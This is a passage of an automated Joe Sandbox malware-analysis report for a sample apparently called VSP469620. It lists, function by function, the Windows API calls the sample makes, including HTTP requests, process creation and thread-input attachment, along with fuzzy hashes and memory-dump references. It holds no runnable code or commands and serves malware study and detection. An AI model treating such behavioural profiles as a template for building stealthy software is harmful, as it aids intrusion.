                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00AF4062
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF4071
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AF4083
                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF409C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF40AE
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF40F3
                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF4108
                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF4113
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              • Opcode ID: cc0335d7a80bf4d96b9da82aa31b6185881dfebc4cbc7c712e1e3dd06e71ae75
                                                              • Instruction ID: a0dbb3103bc993bae7c84825a4bf6306465b807e365d71237fee00ae399ece52
                                                              • Opcode Fuzzy Hash: cc0335d7a80bf4d96b9da82aa31b6185881dfebc4cbc7c712e1e3dd06e71ae75
                                                              • Instruction Fuzzy Hash: A431B171540209AFEB11DFA4EC46B7A77BDEB98711F208105FA08E72A0CFB599808B65
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00ACB496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 00ACB4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 00ACB4B5
                                                              • GetStockObject.GDI32(00000005), ref: 00ACB4BD
                                                              • GetClientRect.USER32(?), ref: 00B2DD63
                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B2DD7A
                                                              • GetWindowDC.USER32(?), ref: 00B2DD86
                                                              • GetPixel.GDI32(00000000,?,?), ref: 00B2DD95
                                                              • ReleaseDC.USER32(?,00000000), ref: 00B2DDA7
                                                              • GetSysColor.USER32(00000005), ref: 00B2DDC5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                              • String ID:
                                                              • API String ID: 3430376129-0
                                                              • Opcode ID: af609e5be9393155d473fa367b2d54edd9794eafb6ca828a6bead58130731f2c
                                                              • Instruction ID: 62c10eb76f7cc4c9c425e15aaf67063ad9afc1a054d5fdede0794d9ba3da783a
                                                              • Opcode Fuzzy Hash: af609e5be9393155d473fa367b2d54edd9794eafb6ca828a6bead58130731f2c
                                                              • Instruction Fuzzy Hash: 76114C31500605EFDB216BB4FC0AFAD7BB1EB14325F218665FA6AA60E1CF324951DB20
                                                              APIs
                                                              • EnumChildWindows.USER32(?,00AECF50), ref: 00AECE90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                              • API String ID: 3555792229-1603158881
                                                              • Opcode ID: 9b80a51a5d4e936e608ea14bb79f6442597ac37cfb2f538081be0471f2cdfbb6
                                                              • Instruction ID: c68097e28016fc594dae5c5b776aa4e462bd51c84f223e681482a7b4b7e73853
                                                              • Opcode Fuzzy Hash: 9b80a51a5d4e936e608ea14bb79f6442597ac37cfb2f538081be0471f2cdfbb6
                                                              • Instruction Fuzzy Hash: 1A91E931600686ABCB18DF61C582BEEFBB5FF04310F548559D85AA7151DF30A95BCBD0
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AB30DC
                                                              • CoUninitialize.OLE32(?,00000000), ref: 00AB3181
                                                              • UnregisterHotKey.USER32(?), ref: 00AB32A9
                                                              • DestroyWindow.USER32(?), ref: 00B25079
                                                              • FreeLibrary.KERNEL32(?), ref: 00B250F8
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B25125
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: 025ba30ea49d8d94e3c2d89309535d0ef884967706d2b35dbe021e88f0b1f657
                                                              • Instruction ID: 709d8c470f6af1199b7f69f49a45838531290b64ae3ee22ea12e9a89be628a16
                                                              • Opcode Fuzzy Hash: 025ba30ea49d8d94e3c2d89309535d0ef884967706d2b35dbe021e88f0b1f657
                                                              • Instruction Fuzzy Hash: 5B9117356002128FCB15EF24D995BA9F3B8FF14305F5482A9E50AA7263DF30AE66CF54
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00ACCC15
                                                                • Part of subcall function 00ACCCCD: GetClientRect.USER32(?,?), ref: 00ACCCF6
                                                                • Part of subcall function 00ACCCCD: GetWindowRect.USER32(?,?), ref: 00ACCD37
                                                                • Part of subcall function 00ACCCCD: ScreenToClient.USER32(?,?), ref: 00ACCD5F
                                                              • GetDC.USER32 ref: 00B2D137
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B2D14A
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B2D158
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B2D16D
                                                              • ReleaseDC.USER32(?,00000000), ref: 00B2D175
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B2D200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: 528044f14ea25e84f3ecb89e87319292c71ddbc46dffef0534e3374af62ce5ba
                                                              • Instruction ID: eff1e0ce98fc628f7d1d2d3e86aa64c68496e1204adb6eacfdae95638295fd7b
                                                              • Opcode Fuzzy Hash: 528044f14ea25e84f3ecb89e87319292c71ddbc46dffef0534e3374af62ce5ba
                                                              • Instruction Fuzzy Hash: 4F71A131400205DFCF219F68E885EEA7BB5FF48321F2446A9ED5D6B2A5CB318C91DB60
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                                • Part of subcall function 00ACB63C: GetCursorPos.USER32(000000FF), ref: 00ACB64F
                                                                • Part of subcall function 00ACB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00ACB66C
                                                                • Part of subcall function 00ACB63C: GetAsyncKeyState.USER32(00000001), ref: 00ACB691
                                                                • Part of subcall function 00ACB63C: GetAsyncKeyState.USER32(00000002), ref: 00ACB69F
                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00B1ED3C
                                                              • ImageList_EndDrag.COMCTL32 ref: 00B1ED42
                                                              • ReleaseCapture.USER32 ref: 00B1ED48
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00B1EDF0
                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B1EE03
                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00B1EEDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                              • API String ID: 1924731296-2107944366
                                                              • Opcode ID: a2218e46bc15d91de1fab36983d906bf6a4d4a8f7f11d92f2904d8423ce142e7
                                                              • Instruction ID: 0a29d9d5edb355ff0e44b41cdbe4db930ab897e1b9d2394bc3991ce11a7a3eae
                                                              • Opcode Fuzzy Hash: a2218e46bc15d91de1fab36983d906bf6a4d4a8f7f11d92f2904d8423ce142e7
                                                              • Instruction Fuzzy Hash: 04516871204300AFD714DF28DC96FAA77E8EB88714F50492DF9A5972A2DB70D984CB62
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B045FF
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B0462B
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B0466D
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B04682
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B0468F
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B046BF
                                                              • InternetCloseHandle.WININET(00000000), ref: 00B04706
                                                                • Part of subcall function 00B05052: GetLastError.KERNEL32(?,?,00B043CC,00000000,00000000,00000001), ref: 00B05067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 1241431887-3916222277
                                                              • Opcode ID: 0ee47cabdc5bd9034947e1a4e5cf601558f8f4d2cb3f0e29dbdfed1d76d61d8a
                                                              • Instruction ID: 8c7a4a08359c1f5d42df626855d0eb0b690e06566d6257698bd4fbd8ff6a1e54
                                                              • Opcode Fuzzy Hash: 0ee47cabdc5bd9034947e1a4e5cf601558f8f4d2cb3f0e29dbdfed1d76d61d8a
                                                              • Instruction Fuzzy Hash: B6415BB1501205BBEB129F50DC85FBF7BECEB09344F104196FA059A191EBB19D448BA4
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B4DC00), ref: 00B0B715
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B4DC00), ref: 00B0B749
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B0B8C1
                                                              • SysFreeString.OLEAUT32(?), ref: 00B0B8EB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: fd01f191ef901729f0079951ea8355397baf0e442e96e93acb9d4120458d50fd
                                                              • Instruction ID: 839f10c2f189ce6af6afacb3c02db9e2c9494f4cf04ef81df9456021f76b82db
                                                              • Opcode Fuzzy Hash: fd01f191ef901729f0079951ea8355397baf0e442e96e93acb9d4120458d50fd
                                                              • Instruction Fuzzy Hash: A1F14D75A00209EFCF04DF94C888EAEBBB9FF49315F148499F915AB291DB31AE41CB50
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B124F5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B12688
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B126AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B126EC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1270E
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1286F
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B128A1
                                                              • CloseHandle.KERNEL32(?), ref: 00B128D0
                                                              • CloseHandle.KERNEL32(?), ref: 00B12947
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: cf56f5bfaac6f177594753e77b951726c9e08e084390189bdc37a35b6f8a3abf
                                                              • Instruction ID: aad7990ed7d357dda82e0e6a6e60e33abdeea63ae1ac2398eb5e4e9dd3ff534a
                                                              • Opcode Fuzzy Hash: cf56f5bfaac6f177594753e77b951726c9e08e084390189bdc37a35b6f8a3abf
                                                              • Instruction Fuzzy Hash: A8D1A135604240DFCB14EF24C991BAEBBE5EF84320F14899DF9999B2A2DB31DC50CB52
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B1B3F4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 64d7e25794edef859336352121bb4ff5051cde716e4c46805ae50593c84e0647
                                                              • Instruction ID: 433afcf919888515f6ca038d61ca0f7bb3963da77ff560b6d2a4b301c173a788
                                                              • Opcode Fuzzy Hash: 64d7e25794edef859336352121bb4ff5051cde716e4c46805ae50593c84e0647
                                                              • Instruction Fuzzy Hash: 21519131500204BBEF209F28DC96FED3BE9EB05314FA48195F625E62E2DB71E9D08B55
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B2DB1B
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B2DB3C
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B2DB51
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B2DB6E
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B2DB95
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00ACA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B2DBA0
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B2DBBD
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00ACA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B2DBC8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                              • String ID:
                                                              • API String ID: 1268354404-0
                                                              • Opcode ID: 05aa6ce868419b60604f298813fe7d441443c8fb3b9b37a72fe5d71cf69ac7b3
                                                              • Instruction ID: adc1876bd36feddf10aa9f867898cabac03e1c2c13cb03a2ad297440bf6b0c2d
                                                              • Opcode Fuzzy Hash: 05aa6ce868419b60604f298813fe7d441443c8fb3b9b37a72fe5d71cf69ac7b3
                                                              • Instruction Fuzzy Hash: ED514770600208EFDB20DF68DC96FAA77F8FB18754F210618F94AA7290DB70A990DB50
                                                              APIs
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AF5FA6,?), ref: 00AF6ED8
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AF5FA6,?), ref: 00AF6EF1
                                                                • Part of subcall function 00AF72CB: GetFileAttributesW.KERNEL32(?,00AF6019), ref: 00AF72CC
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00AF75CA
                                                              • _wcscmp.LIBCMT ref: 00AF75E2
                                                              • MoveFileW.KERNEL32(?,?), ref: 00AF75FB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: d83ba8e6ea708e3f9f8ddbbf440239a712d66e2569b91fed4928894506615df6
                                                              • Instruction ID: 56a3a059bfae7886bf3f51899cbe9502e1c955041026b4ecab52a5f573fe3249
                                                              • Opcode Fuzzy Hash: d83ba8e6ea708e3f9f8ddbbf440239a712d66e2569b91fed4928894506615df6
                                                              • Instruction Fuzzy Hash: 1E5101B2A0922D9ADF54EBA4E981DEE73BC9F08310F1044AAF605E3141EA7497C5CB64
                                                              APIs
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B2DAD1,00000004,00000000,00000000), ref: 00ACEAEB
                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B2DAD1,00000004,00000000,00000000), ref: 00ACEB32
                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B2DAD1,00000004,00000000,00000000), ref: 00B2DC86
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B2DAD1,00000004,00000000,00000000), ref: 00B2DCF2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 5387f6f7ec8694282eba3d5cefd61dc6033197007bafd19fad31250c61469c48
                                                              • Instruction ID: 4de3cdf3b88581301d968f3f51702e9d8f68cd45b4e8d391e5d7e7c78cc51c0b
                                                              • Opcode Fuzzy Hash: 5387f6f7ec8694282eba3d5cefd61dc6033197007bafd19fad31250c61469c48
                                                              • Instruction Fuzzy Hash: 8E41D671209680DAD739CB28AE8DF7A7AE5EB45305F6BC84DF05B87561CA70AC80D721
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00AEB26C
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00AEB273
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00AEB288
                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00AEB290
                                                              • DuplicateHandle.KERNEL32(00000000), ref: 00AEB293
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 00AEB2A3
                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00AEB2AB
                                                              • DuplicateHandle.KERNEL32(00000000), ref: 00AEB2AE
                                                              • CreateThread.KERNEL32(00000000,00000000,00AEB2D4,00000000,00000000,00000000), ref: 00AEB2C8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 72f04cedb3d9faaaa25a3d0d7886c5a92abab91459a798d789546db25ef6fc16
                                                              • Instruction ID: d2328d5364f2475fea88970283bc4be86fd9b5a29228920207330222e6472dbf
                                                              • Opcode Fuzzy Hash: 72f04cedb3d9faaaa25a3d0d7886c5a92abab91459a798d789546db25ef6fc16
                                                              • Instruction Fuzzy Hash: 1D01B6B5640348BFE710ABA5EC4DF6B7BACEB88711F118411FA05DB1A1CAB49C00CB65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
